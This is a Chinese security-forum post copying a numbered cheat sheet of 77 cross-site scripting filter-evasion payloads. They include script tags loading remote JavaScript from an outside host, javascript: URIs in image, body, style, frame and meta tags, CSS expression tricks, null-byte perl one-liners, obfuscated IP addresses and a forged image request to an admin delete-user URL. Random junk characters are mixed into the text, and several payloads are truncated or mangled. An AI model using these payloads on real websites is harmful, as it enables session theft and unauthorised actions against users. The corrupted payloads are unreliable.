貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
" `) n% E( O6 x+ H# f5 ^(1)普通的XSS JavaScript注入* G$ }, F+ z! A+ p4 G
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>7 g; J8 ^$ o9 }# h0 {$ f; o
(2)IMG标签XSS使用JavaScript命令
0 l( O; T! H* A5 C+ K5 Z<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* Q& } v \# [ w3 u(3)IMG标签无分号无引号
) {% E, H Z2 z) u/ W- X<IMG SRC=javascript:alert(‘XSS’)>
2 X' p0 N! [5 _# F1 [. J(4)IMG标签大小写不敏感
: [; Y9 W8 x: h) T4 W7 D/ W<IMG SRC=JaVaScRiPt:alert(‘XSS’)>2 h, u8 \, }; P. U: p% |
(5)HTML编码(必须有分号)
$ d6 C6 l) S7 b" n* K4 T+ F6 H<IMG SRC=javascript:alert(“XSS”)>! K" [: L' Z. m- |8 ]8 l
(6)修正缺陷IMG标签: t# L7 c- z( w, I m" ~, d7 d( p
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>! t' n/ }- V R4 [
" ?" a! k; m- M6 `% [' }4 \0 G* n, m
(7)formCharCode标签(计算器)
* m8 @4 x3 e2 b0 q- d) Z<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
* m4 v! Z) J( f' Y# y5 b+ D(8)UTF-8的Unicode编码(计算器)
5 ?! p. w ]/ [5 p* c- W! {5 K# g<IMG SRC=jav..省略..S')> |& ~1 g9 p* w: T. R6 Q* F
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)- Y9 O5 f, _7 V* e, s4 B5 }
<IMG SRC=jav..省略..S')>
! e7 [/ Y6 c5 V7 E0 a* M- o& ^* L(10)十六进制编码也是没有分号(计算器)
: Q& n5 K) Y5 o; Z) U6 J" { P<IMG SRC=java..省略..XSS')>
$ x# q7 X0 D( a1 @2 c(11)嵌入式标签,将Javascript分开
5 o" b1 z+ _" q p S6 ^. B<IMG SRC=”jav ascript:alert(‘XSS’);”>
: G: y9 z# F x$ Z5 H(12)嵌入式编码标签,将Javascript分开/ h, x, c+ G+ q- N7 i
<IMG SRC=”jav ascript:alert(‘XSS’);”>9 D5 r5 i( {1 T, G4 J) K
(13)嵌入式换行符
* j. Z3 y2 `/ U( N% X! l6 _# B2 p4 x<IMG SRC=”jav ascript:alert(‘XSS’);”>8 H; C" \' j9 d z+ Z: g
(14)嵌入式回车+ K" F% L0 d9 A) w! V" y
<IMG SRC=”jav ascript:alert(‘XSS’);”>9 ~8 }1 d+ \# w+ X' V
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
2 Q" c5 m' G) e" P6 u<IMG SRC=”javascript:alert(‘XSS‘)”>3 y) `+ }1 E+ E* A
(16)解决限制字符(要求同页面)
7 k; h# o: D* F- _9 O<script>z=’document.’</script>
6 }0 R9 K) J4 }8 S( e7 A9 u( W<script>z=z+’write(“‘</script>+ k4 D& D9 [3 _3 ?
<script>z=z+’<script’</script>6 v. }+ U) E1 U! j- S4 j2 ]$ h
<script>z=z+’ src=ht’</script>
, B1 i( v" E# i2 c<script>z=z+’tp://ww’</script>: R. P: H. o$ X! t8 \4 ^
<script>z=z+’w.shell’</script>
' e7 c# y7 G8 k7 q5 g( V0 c- Y/ G<script>z=z+’.net/1.’</script>
! u8 S) E; `% i8 x3 S! v<script>z=z+’js></sc’</script>
H+ t6 ?. E: E: n& U V: d. O<script>z=z+’ript>”)’</script>; i* M2 x# s- `5 K% G6 H, m
<script>eval_r(z)</script>
" L% n& h5 I; k5 z. ?% |( ](17)空字符12-7-1 T00LS - Powered by Discuz! Board4 u1 t8 Y- k+ d' n$ t1 `, N. U
https://www.t00ls.net/viewthread ... table&tid=15267 2/69 K1 `/ p/ s7 `7 U: R$ f
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out( _( q5 A1 A5 t3 m% |- T2 h
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
$ V. g1 @7 L! c7 Uperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out- t! u6 t) e ]& i: M* C% e) D z
(19)Spaces和meta前的IMG标签8 d! Z. m. v6 ~- D. A8 w. |: o
<IMG SRC=” javascript:alert(‘XSS’);”># @! g: ?, u0 ]* M& Q1 F
(20)Non-alpha-non-digit XSS$ }. E R9 w4 }' i' r
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
9 F: @) ]/ k9 X I/ Q(21)Non-alpha-non-digit XSS to 24 o7 S/ Y; D/ t
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
8 {# @6 O2 @1 ^- y. j" t4 g" R(22)Non-alpha-non-digit XSS to 3
2 i; \# l- Z) q<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
' o: {0 o; h3 h6 D5 c(23)双开括号 v+ v, n- f1 E8 B" I
<<SCRIPT>alert(“XSS”);//<</SCRIPT>$ E0 n% |2 T8 T" |4 Y! @
(24)无结束脚本标记(仅火狐等浏览器)! U9 T! t8 g% ^$ e7 n$ Q
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
5 E) B5 O& s3 J9 S, K; y" v4 l+ }4 w, e2 g(25)无结束脚本标记2
7 W) K! V7 f* h$ \: K2 m' `# i<SCRIPT SRC=//3w.org/XSS/xss.js>
0 I3 [" q; T4 L' K% |2 E(26)半开的HTML/JavaScript XSS
1 `, G2 f" q' s<IMG SRC=”javascript:alert(‘XSS’)”
% d4 h2 L2 f7 L9 h(27)双开角括号+ j) S& Z$ s+ S
<iframe src=http://3w.org/XSS.html <
. j" ~" l# g9 q7 Y! U(28)无单引号 双引号 分号$ k7 E8 P( ~+ {+ B2 p$ z1 c; H
<SCRIPT>a=/XSS/
( C) s1 `" ~" \) Ealert(a.source)</SCRIPT>: o' I4 R2 t9 w
(29)换码过滤的JavaScript
5 c4 K+ S# c" Y, a\”;alert(‘XSS’);//
7 J4 H9 V3 b2 M( J ?. n(30)结束Title标签
6 I1 f7 f4 k% l4 N0 {: u+ F</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
; B4 q5 \2 T0 u" F# U(31)Input Image6 p6 U" @0 R- Q5 v- C8 d
<INPUT SRC=”javascript:alert(‘XSS’);”>
% L2 J0 B$ m2 w, V8 X o(32)BODY Image; v3 x+ A2 [. P2 c: V0 }3 ^
<BODY BACKGROUND=”javascript:alert(‘XSS’)”># M& r2 a, h& C: M! r
(33)BODY标签* {7 Q9 h3 O2 f/ ]
<BODY(‘XSS’)>3 Y% i( `- S2 ] o0 Q
(34)IMG Dynsrc
, l( X! }9 K @<IMG DYNSRC=”javascript:alert(‘XSS’)”>
. u' C0 q# U! Z. {8 R(35)IMG Lowsrc7 A) _$ r( S, h# x7 V& o' y3 a
<IMG LOWSRC=”javascript:alert(‘XSS’)”>! L( ?" C8 y2 w+ ~
(36)BGSOUND9 E- J) P( B0 A
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
7 }+ ]! a: B8 ^" [(37)STYLE sheet
$ p* I4 B' s, e/ [5 Y w$ Y) R' L<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>6 o% S, ~! e' I o
(38)远程样式表" A" W _. G8 O' J. b( K
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
) z X) l$ j4 V3 I(39)List-style-image(列表式)
( K* u4 R2 W( p) C" y/ v7 X" h# ?<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS$ B+ |8 d5 f- S
(40)IMG VBscript9 W( U5 e, l5 i8 ^ I
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
" b- z( ?. ]: l0 f& q(41)META链接url) q4 Z. ]5 B8 W+ P0 n1 }
0 {* V. I3 U# Z$ z
1 ?$ @) X, V: A% Q! z/ }( y
<META HTTP-EQUIV=”refresh” CONTENT=”0;5 I1 ` \% @5 d1 K* E$ j' I
URL=http://;URL=javascript:alert(‘XSS’);”>* h- M8 e' r" O) X4 K$ U
(42)Iframe5 g; T. f3 e/ v& \7 T
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- O$ }6 _ @. I' y7 t% [7 X' D+ f(43)Frame
4 g( b9 O8 q( G) R<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
5 }! P2 I' \2 Z' |( \7 }( Q1 |8 N3 E ~https://www.t00ls.net/viewthread ... table&tid=15267 3/6
& }7 D# u5 v0 t ~' I' g(44)Table
2 j5 O5 T8 I& A. K! [<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
5 k+ f- b' G9 M# V(45)TD
s5 n& x& ^& I0 b! d$ p+ E$ o<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
+ u3 a1 W. ]3 I4 A(46)DIV background-image
" Z6 x! O5 y1 f7 r- S; h, e* \( V4 S0 W<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>2 h V3 Z, D, J4 ?) Y- e
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
5 A) z3 l! J% c/ a: f; \. U; |0 z8&13&12288&65279)
6 h6 M) J$ _6 _5 o6 W# |& H5 d<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- |1 i& R( h4 M(48)DIV expression
$ U6 y1 d" \; p' y! s3 n<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
0 f/ v6 |' C& J8 Q0 m& z9 r. @(49)STYLE属性分拆表达+ i( f6 t; J ]; W, e. g& o d) M! L
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>" R, b4 v& ?& |' D! b
(50)匿名STYLE(组成:开角号和一个字母开头); @( D6 w, L4 z6 A. d/ N# E
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
& D& Q% V4 ^+ ? ^+ }4 w(51)STYLE background-image
& r9 u& ^+ V2 V& ^) c% @5 |$ k) _2 l<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A) G# h' k( m9 {4 d+ g/ Y4 X/ ?
CLASS=XSS></A>, w6 W- p2 q# F) ^+ H
(52)IMG STYLE方式
+ I: f* X& o6 p+ d4 w" fexppression(alert(“XSS”))’>
& m4 Z$ m% z- K' ~5 ], m(53)STYLE background- s# K: a- Y3 ^7 Z# R
<STYLE><STYLE
3 E! |# ~! l* ~0 [3 ?, ]% |! stype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>" c" U- p5 l% q$ F6 \ y
(54)BASE+ \" F: a( {* Y& q8 b
<BASE HREF=”javascript:alert(‘XSS’);//”>
" A7 m* c4 a4 G- G1 l(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS' T3 d( R$ y m/ ~; j7 y
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>9 ~# e0 e7 x; m) o2 u
(56)在flash中使用ActionScrpt可以混进你XSS的代码
3 I$ j- E/ [* _4 ua=”get”;
" P) F. h o2 {b=”URL(\”";! ]5 a0 f5 K9 K! E; C3 r; B
c=”javascript:”;
3 w* ^2 A+ g8 Y" p0 hd=”alert(‘XSS’);\”)”;
& ` e" `1 X: F7 e ^eval_r(a+b+c+d);- J+ j! d0 z. w' a; h
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上, z% b' O! [, ~7 L% f/ j' \4 n
<HTML xmlns:xss>6 u4 V7 c) z5 I9 ~
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>" w2 v9 ]) n4 w a, V9 e q
<xss:xss>XSS</xss:xss>( g( I, e L, A' |* _: U
</HTML>' }3 ~( i+ O# P1 ?5 b
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用7 `: {# ]' y* r1 { P# M, k: R
<SCRIPT SRC=””></SCRIPT>
' \! H7 H& A$ U$ J5 N(59)IMG嵌入式命令,可执行任意命令
: x/ C( h# C- G/ m<IMG SRC=”http://www.XXX.com/a.php?a=b”>
* q; E- ~* E/ ]0 U(60)IMG嵌入式命令(a.jpg在同服务器)5 |% M" I3 w: ~: \+ Z E
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
' z3 W' }- O! W6 f/ Q7 O(61)绕符号过滤: y! @5 x$ d5 P% O
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT># C" S C6 e4 ^: T
(62)$ k8 u- F. C1 T" ~8 G
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
, b& B1 G+ i# r u(63)
: J' Z" X' @5 a* O<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>3 Z" z/ B# _! d) {+ F
(64)5 U2 V3 r" Y$ u2 l5 o1 e; ?
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
]( i5 ^6 s' a3 F. b(65)6 k6 U8 C( i' y5 V \( B: o
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
. W N {, J2 ^( F2 P+ z(66)12-7-1 T00LS - Powered by Discuz! Board2 g: w4 g. X; }# d! W
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
2 C+ i, i, r8 s) a2 q<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
* I I# K4 `; I! Q2 O! E(67)
4 a; U% i$ T4 x) I. n<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
: s; U5 T# ~4 S1 [0 ]. ^" M3 J, U</SCRIPT>1 L( ^0 J$ n. ^# Q
(68)URL绕行" m+ f1 L' \! y+ y0 l
<A HREF=”http://127.0.0.1/”>XSS</A>! r& q. r) o1 \1 A# G
(69)URL编码
9 \" g/ @- J" z @8 Q H$ z<A HREF=”http://3w.org”>XSS</A>
& m/ D" U5 ~. i. l(70)IP十进制
8 K- ]! L' b* V. z% Q# K<A HREF=”http://3232235521″>XSS</A>! a" t' ^. v! X9 h0 o i
(71)IP十六进制- H9 V, l; `" Q6 X1 n5 t; k6 q. a: g
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
3 r: j* O7 q3 N% D, ](72)IP八进制
9 {- F s) h2 v+ |<A HREF=”http://0300.0250.0000.0001″>XSS</A>
! u$ `: V& v, c: O(73)混合编码2 [$ O5 p/ f5 R- O* w' O+ c
<A HREF=”h" L* x. {# B" W) Q7 F) i
tt p://6 6.000146.0×7.147/”">XSS</A>7 k; }5 C. u7 _. V
(74)节省[http:]
* H; D9 o) Z; X/ u; F: h<A HREF=”//www.google.com/”>XSS</A>
& F& ^9 u; s Q9 b x(75)节省[www]
; N% v% X& [6 O+ O- e<A HREF=”http://google.com/”>XSS</A> A# G& k: a% K# {$ h3 N
(76)绝对点绝对DNS
0 F% u% S$ c4 K( X4 [- E( U0 E j<A HREF=”http://www.google.com./”>XSS</A>
2 @" y8 ^2 F/ ?0 k( N- M(77)javascript链接
9 n2 {/ T$ P3 q! ~<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>+ q) F/ ^$ Y+ ?. q4 m
; K& w8 G8 j, S) D& C
原文地址:http://fuzzexp.org/u/0day/?p=14% d* X. e* s2 _4 i& z
, p' F/ A/ _2 a8 a) w& ? |
发表于 2013-4-19 19:22:37
收藏
支持
反对